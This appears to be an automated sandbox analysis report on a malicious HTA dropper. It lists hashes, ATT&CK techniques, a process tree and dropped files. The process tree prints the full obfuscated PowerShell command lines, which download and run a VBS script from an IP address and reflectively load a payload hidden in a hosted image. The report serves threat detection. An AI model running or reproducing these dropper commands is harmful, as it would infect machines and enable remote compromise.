5147e58c7d2d5d0296c74619c246f81569dab8c9271513b19b3d1bd4c406c702

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
03-12-2024 13:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

niceworkingpersonwithhergirlfriendsheisbeautiful.hta
Size

155KB
MD5

b57e8c4722889166196bd6ca92c4383a
SHA1

5628162ab713e034f10fce235b08c0ff8e4131d5
SHA256

5147e58c7d2d5d0296c74619c246f81569dab8c9271513b19b3d1bd4c406c702
SHA512

2887fad423bd58e20edee6d0809fcfbf2a768d14f463da8ddf69e0eb823e3f42304eb41fc38111124c60b3d4e9385054f0cf7d84512e6b5128cf8e43ba70847d
SSDEEP

96:4owZw9d6yfaRlC/5u5oB3WnKqjIlgREe/b2F53QStlC/5u5oB3WnKqjIAgREe/bQ:4Lwsoqvgc12OYUQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	Process
4	2800	powershell.exe
6	2152	powershell.exe
8	2152	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

Processes:

cmd.exepowershell.exe

pid	Process
1152	cmd.exe
2800	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
2152	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exepowershell.execsc.execvtres.exeWScript.exepowershell.exemshta.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2800	powershell.exe
2152	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

mshta.execmd.exepowershell.execsc.exeWScript.exe

description	pid	Process	procid_target
PID 768 wrote to memory of 1152	768	mshta.exe	30
PID 768 wrote to memory of 1152	768	mshta.exe	30
PID 768 wrote to memory of 1152	768	mshta.exe	30
PID 768 wrote to memory of 1152	768	mshta.exe	30
PID 1152 wrote to memory of 2800	1152	cmd.exe	32
PID 1152 wrote to memory of 2800	1152	cmd.exe	32
PID 1152 wrote to memory of 2800	1152	cmd.exe	32
PID 1152 wrote to memory of 2800	1152	cmd.exe	32
PID 2800 wrote to memory of 2764	2800	powershell.exe	33
PID 2800 wrote to memory of 2764	2800	powershell.exe	33
PID 2800 wrote to memory of 2764	2800	powershell.exe	33
PID 2800 wrote to memory of 2764	2800	powershell.exe	33
PID 2764 wrote to memory of 2896	2764	csc.exe	34
PID 2764 wrote to memory of 2896	2764	csc.exe	34
PID 2764 wrote to memory of 2896	2764	csc.exe	34
PID 2764 wrote to memory of 2896	2764	csc.exe	34
PID 2800 wrote to memory of 2676	2800	powershell.exe	36
PID 2800 wrote to memory of 2676	2800	powershell.exe	36
PID 2800 wrote to memory of 2676	2800	powershell.exe	36
PID 2800 wrote to memory of 2676	2800	powershell.exe	36
PID 2676 wrote to memory of 2152	2676	WScript.exe	37
PID 2676 wrote to memory of 2152	2676	WScript.exe	37
PID 2676 wrote to memory of 2152	2676	WScript.exe	37
PID 2676 wrote to memory of 2152	2676	WScript.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\niceworkingpersonwithhergirlfriendsheisbeautiful.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:768
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqus0jhd.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2764
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES986A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9869.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2896
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2676
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabB4B1.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES986A.tmp

Filesize
1KB

MD5
0d05bee1fe05b39a2e683951ec7e0136

SHA1
33b0658d3634121c57488edfeab8425e1588b84c

SHA256
fdd2d447eef8a1c2ade9cfad816f64846d0dc776772d15ab0a0e12c0213cdba8

SHA512
dad5ac49f0d6b185d6e8efe98087938a0efc1dc0f1bd650c8d9821fe6ce7b213210bf6af749246a58f0e96cfb9924a33889a9782f35d4684fbef834499eb8d64

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB4D3.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\wqus0jhd.dll

Filesize
3KB

MD5
dc71c2421d93349c642825146b823eca

SHA1
39934dee71cbbbcef47b6b2cf7b5aa9ad3ded8c1

SHA256
503e5cfb128a0ee3c1d629c671b91c24dfb6dc9846b2d0ee69fd35438e059a9f

SHA512
308694f96dfeb8e8bf6dbed2f36b42569d9e5d6928696ed2d65a7196ac349e1e05c53a8ffde330165f2fd5f8a6352ea6b9729a8f96028359e7eb3bd2a8a64c33

Download Submit
C:\Users\Admin\AppData\Local\Temp\wqus0jhd.pdb

Filesize
7KB

MD5
51c27088dd8b950a296754e3de7d7d2e

SHA1
98940ec4638686841bd90588ee2e250e3af1c809

SHA256
01aa47d092afba99e3c98756a87c0da95979c6f2fd20a61efa8a56e9a8a84981

SHA512
1fadd0f0d7263bdf28e116afbdf1357266d838091b93a9676ebc12ca87661954c122bcdd2d9b0151f7833c5655e8c8d8223e396e7352ad048fee9818098d53e3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
3c09632033ea80d9dffe0f35562b9196

SHA1
7f223e273448355e859d08b832ea97b00c4a925d

SHA256
7a925106727c983f023bcd2d377751b158e342e4b3d14ab17435f4353e13bd40

SHA512
3f31b44e88f3a42237c1ae6a095c228090b2584357ac249293e66e39367793d199bbb174ace18dd5cb4ad6dbdf69edb6bcc6b16f1bdbc21482da0ed0e08de36e

Download Submit
C:\Users\Admin\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS

Filesize
150KB

MD5
23f2631ce99480a209b12a8f520d5480

SHA1
1f6cb113c9a2ff37ce5047b25ee7f432a4dbc950

SHA256
4f1b501ad9c6cfedac6521c680f30d4fdbfdbd86c2742755d07f67c4939f0235

SHA512
d906b932e7d6c8bd87d47e7d52e2caf0ae05231e02ba720d8f81d9a90f5a2688773ec80ca91775b8753812fd638d2d123564489da066a4c423dd76eb7f5ccaae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9869.tmp

Filesize
652B

MD5
351fece87dddd99f32f36402d8bcf8d0

SHA1
be6ee22cc2488dfd500a71aff6ce29a8d5eba240

SHA256
94be53553d554889dc487796eefc451e681e7e81d63e6e4db7a0f0638bd23c31

SHA512
8258a3b3ad22a0b1f478ee9e81acc6344526c4f4a11e65605244a354199fbd22320c47b7b4290f9be339ac99e14d63227215941a95f69eccec7ba497b4ab2143

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wqus0jhd.0.cs

Filesize
488B

MD5
3b52e3d1532b0beb731c47fe5cf04437

SHA1
7135f88114807b36be4b96e49e2ed21c1c2e48e1

SHA256
d89d61099f569f77396fefcda11858cdc45fecc437afa5204b654a63c0393ad8

SHA512
d49eeb4817fd128b9c27930cc82388d17678684c56b9a92aa3f52154485ca0ed2e168849f9e7fc1815adca53b0ad57f525464087b4c3d9e14d02423d8939f8f2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wqus0jhd.cmdline

Filesize
309B

MD5
2def8d5296fc0d590881f81b0dc1af3c

SHA1
14565cf73299b5c53fb3218e0ed4addf6da77f32

SHA256
117f47ce0b0204e71f49faf57f7ff6d989c66b1087b5ac156891de04ea7a7cf6

SHA512
a74e278ecc2d4b8539ff1e958ff0ae7348a0183c755f4aaa2da0d27edc94032d7586d233db5e6fda48b5a7616469c8bf6fbc48ddee958b12b4239afe3f449383

Download Submit